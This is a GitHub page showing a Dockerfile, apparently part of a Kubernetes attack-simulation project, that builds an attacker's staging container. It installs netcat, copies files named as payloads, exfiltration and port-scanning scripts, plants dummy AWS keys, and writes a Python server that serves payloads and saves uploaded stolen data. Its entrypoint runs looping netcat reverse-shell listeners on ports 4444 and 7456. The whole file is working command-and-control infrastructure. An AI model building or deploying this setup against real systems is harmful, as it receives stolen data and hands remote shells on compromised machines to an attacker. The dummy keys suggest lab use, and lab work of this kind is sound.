clusterfuck/Dockerfile.payload at main · bilals12/clusterfuck · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
FROM python:3.9-slim

ENV DEBIAN_FRONTEND=noninteractive \
    TZ=Etc/UTC \
    HTTP_PORT=8080 \
    SHELL_PORT_1=4444 \
    SHELL_PORT_2=7456 \
    ATTACK_DEBUG=0

RUN apt-get update && \
    apt-get install -y --no-install-recommends \
        curl wget netcat-openbsd netcat-traditional && \
    rm -rf /var/lib/apt/lists/*

RUN mkdir -p /payloads/uploads /payloads/shells

COPY xmx2 www cc.py pt xmx2.so run.sh noumt config.json exfil.py portscan.py /payloads/
RUN chmod +x /payloads/*

RUN echo '{"RoleName":"dummy-k8s-cluster-role"}' > /payloads/iam-role.json && \
    echo '{"AccessKeyId":"AKIADUMMYDUMMYDUMMY","SecretAccessKey":"dummysecretkey1234567890abcdefghijklmnop"}' > /payloads/aws-keys.json

EXPOSE $HTTP_PORT $SHELL_PORT_1 $SHELL_PORT_2 4445

RUN echo '#!/usr/bin/env python3\n\
import http.server\n\
import socketserver\n\
import os\n\
import cgi\n\
from datetime import datetime\n\
\n\
PORT = int(os.environ.get("HTTP_PORT", 8080))\n\
DEBUG = os.environ.get("ATTACK_DEBUG", "0") == "1"\n\
UPLOAD_DIR = "/payloads/uploads"\n\
\n\
os.makedirs(UPLOAD_DIR, exist_ok=True)\n\
\n\
def log(msg):\n\
    if DEBUG: print(msg, flush=True)\n\
\n\
class Handler(http.server.BaseHTTPRequestHandler):\n\
    def log_message(self, format, *args):\n\
        if DEBUG: super().log_message(format, *args)\n\
\n\
    def do_GET(self):\n\
        log(f"GET {self.path}")\n\
        try:\n\
            path = self.path if self.path != "/" else "/index.html"\n\
            filepath = f"/payloads{path}"\n\
            if os.path.exists(filepath) and os.path.isfile(filepath):\n\
                with open(filepath, "rb") as f:\n\
                    self.send_response(200)\n\
                    self.send_header("Content-type", "application/octet-stream")\n\
                    self.end_headers()\n\
                    self.wfile.write(f.read())\n\
            else:\n\
                self.send_response(404)\n\
                self.end_headers()\n\
                self.wfile.write(b"Not found")\n\
        except Exception as e:\n\
            log(f"Error: {e}")\n\
            self.send_response(500)\n\
            self.end_headers()\n\
\n\
    def do_POST(self):\n\
        log(f"POST {self.path}")\n\
        try:\n\
            form = cgi.FieldStorage(fp=self.rfile, headers=self.headers, environ={"REQUEST_METHOD": "POST"})\n\
            ts = datetime.now().strftime("%Y%m%d_%H%M%S")\n\
\n\
            if "file" in form:\n\
                item = form["file"]\n\
                if item.file:\n\
                    default_name = "data.bin"\n\
                    filename = item.filename if hasattr(item, "filename") and item.filename else default_name\n\
                    fname = f"{ts}_{filename}"\n\
                    fpath = os.path.join(UPLOAD_DIR, fname)\n\
                    with open(fpath, "wb") as f:\n\
                        f.write(item.file.read())\n\
                    log(f"Saved: {fpath} ({os.path.getsize(fpath)} bytes)")\n\
                    self.send_response(200)\n\
                    self.end_headers()\n\
                    self.wfile.write(b"OK")\n\
                    return\n\
\n\
            content_length = int(self.headers.get("Content-Length", 0))\n\
            if content_length > 0:\n\
                data = self.rfile.read(content_length)\n\
                fpath = os.path.join(UPLOAD_DIR, f"{ts}_data.bin")\n\
                with open(fpath, "wb") as f:\n\
                    f.write(data)\n\
                log(f"Saved: {fpath}")\n\
                self.send_response(200)\n\
                self.end_headers()\n\
                self.wfile.write(b"OK")\n\
            else:\n\
                self.send_response(400)\n\
                self.end_headers()\n\
        except Exception as e:\n\
            log(f"Error: {e}")\n\
            self.send_response(500)\n\
            self.end_headers()\n\
\n\
socketserver.TCPServer.allow_reuse_address = True\n\
print(f"Server starting on port {PORT} (DEBUG={DEBUG})")\n\
with socketserver.TCPServer(("", PORT), Handler) as httpd:\n\
    httpd.serve_forever()\n' > /payloads/server.py && chmod +x /payloads/server.py

RUN echo '#!/bin/bash\n\
set -ex\n\
echo "=== Entrypoint starting ==="\n\
NC_BIN=$(command -v nc.traditional || command -v nc.openbsd || command -v nc)\n\
echo "Starting reverse shell listeners on ports $SHELL_PORT_1, $SHELL_PORT_2"\n\
while true; do $NC_BIN -l -p $SHELL_PORT_1 -v 2>&1 | tee -a /payloads/shells/shell_$SHELL_PORT_1.log; sleep 1; done &\n\
while true; do $NC_BIN -l -p $SHELL_PORT_2 -v 2>&1 | tee -a /payloads/shells/shell_$SHELL_PORT_2.log; sleep 1; done &\n\
echo "=== Starting HTTP server on port $HTTP_PORT ==="\n\
cd /payloads\n\
exec python3 -u server.py\n' > /entrypoint.sh && chmod +x /entrypoint.sh

CMD ["/entrypoint.sh"]